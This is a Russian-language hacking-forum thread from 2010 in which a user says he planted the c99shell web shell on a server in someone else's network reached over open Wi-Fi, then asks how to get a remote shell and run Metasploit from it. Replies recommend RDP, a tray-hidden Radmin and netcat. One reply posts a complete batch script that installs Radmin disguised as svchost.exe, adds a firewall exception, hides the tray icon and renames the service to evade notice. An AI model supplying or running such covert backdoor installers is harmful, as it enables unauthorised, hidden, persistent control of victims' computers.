 |
Не знаю какой шелл залить на windows машину |
18.02.2010, 16:19
|
|
Новичок
Регистрация: 14.02.2010
Сообщений: 3
С нами:
8547069
Репутация:
0
|
|
Не знаю какой шелл залить на windows машину
всем привет. проблема вот в чем. Недавно обнаружился у друзей вайфай с халявным инетом.нашел первый попавшийся комп с сервером, чуть поднапрягся и залил туда c99shell, сейчас все работает. как оказалось, это был один из основных компов довольно крупной сети. на данный момент мой внутренний ип вайфай сети 11.0.0.105. мне нужен комп из внешней сети с ипом 192.168.11.53. что в планах: использовать метасплоит, но проблема в том что я не смогу законектиться с нужным компом, так как нахожесь во внутренней сети. хочу залить на поломанный серв метасплоит и уже с него ломать. но опять же мне нужна оболочка для управления поломанным компом, чтоб можно было залить исполняемый файл через с99 и тупо запустить, законнектиться и юзать метасплоит для дальнейших действий. так вот в чем вопрос: подскажите какую нибудь оболочку, чтоб можно было просто залить, запустить и законектиться, разумеется без установки. спасибо
|
|
|
18.02.2010, 16:40
|
|
Новичок
Регистрация: 14.02.2010
Сообщений: 3
С нами:
8547069
Репутация:
0
|
|
тут подумал... msfweb может разрешить доступ извне? например сейчас залью и просто зайду на серв и с него уже буду работать дальше
------------
не, консоль привычней
|
|
|
|
18.02.2010, 18:21
|
|
Reservists Of Antichat - Level 6
Регистрация: 08.04.2008
Сообщений: 286
С нами:
9521666
Репутация:
1695
|
|
ты хоть сам понял чего понаписал?
предложу варианты:
rdp, radmin (radmin есть на форуме не палящийся в трее)
Если конечно тру хеккер =) netcat тебе в помощь =)
PS "из внешней сети с ипом 192.168.11.53." =)
__________________
Cервер cs 1.6
cs.antichat.net:27015
Последний раз редактировалось (Dm); 18.02.2010 в 18:33..
|
|
|
|
19.02.2010, 05:55
|
|
Новичок
Регистрация: 14.02.2010
Сообщений: 3
С нами:
8547069
Репутация:
0
|
|
ты меня чуток не понял да и я толком объяснить не смог. уже неважно. теперь на серве есть netcat. поискал гуглем как поставить metasploit на винду из консоли, чтоб без всяких окошек. ничего толкового не нашел. есть предложения?
|
|
|
|
21.02.2010, 11:03
|
|
Познающий
Регистрация: 21.08.2008
Сообщений: 85
С нами:
9327322
Репутация:
15
|
|
настрой на сломанной машине второго юзера-админа, запусти удалённый рабочий стол и сиди как у себя дома, в чём проблема ?  |
|
|
|
22.02.2010, 14:11
|
|
Познающий
Регистрация: 19.03.2008
Сообщений: 66
С нами:
9549840
Репутация:
13
|
|
Залей радмин 2.1:
3 файла
admdll.dll
raddrv.dll
svchost.exe - ну это екзешник серва радмина r_server.exe
Запустишь через шелл в консоле батник:
Код:
cmdow @ /HID
copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"
netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE
REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f
"%SYSTEMROOT%/svchost.exe" /install /silence
"%SYSTEMROOT%/svchost.exe" /start
Он сначало копирнет длл и сам сервак в /Windows/
Потом дабавит в бредмаузер исключение(если включен)
Уберет иконку радмина
Переименует службу радмина на Service Host Controller
Чтобы не палили
И установит+стартует сам радмин |
|
|
|
07.04.2010, 20:33
|
|
Banned
Регистрация: 06.04.2010
Сообщений: 2
С нами:
8473190
Репутация:
0
|
|
У меня вопрос . Вот залили мы эти 3 файла admdll.dll raddrv.dll svchost.exe и bat-ник , запустили его что бы в трее иконка не выскакивала и прочее выполнилось ..... Разве в реестре появится ключ радминовский, ведь мы не устанавливили Radmin , а просто кинули библиотеки и сервак на удаленный комп ? Если ключ не появится , то где менять значение параметра отображения иконки в трее? Уф, мой первый вопрос )
|
|
|
|
13.04.2010, 15:09
|
|
Новичок
Регистрация: 15.02.2010
Сообщений: 26
С нами:
8544882
Репутация:
5
|
|
Сообщение от Billy_Rays
У меня вопрос . Вот залили мы эти 3 файла admdll.dll raddrv.dll svchost.exe и bat-ник , запустили его что бы в трее иконка не выскакивала и прочее выполнилось ..... Разве в реестре появится ключ радминовский, ведь мы не устанавливили Radmin , а просто кинули библиотеки и сервак на удаленный комп ? Если ключ не появится , то где менять значение параметра отображения иконки в трее? Уф, мой первый вопрос )
В батнике вот эти строки
REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f
как раз добавляют radmin в реестр
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
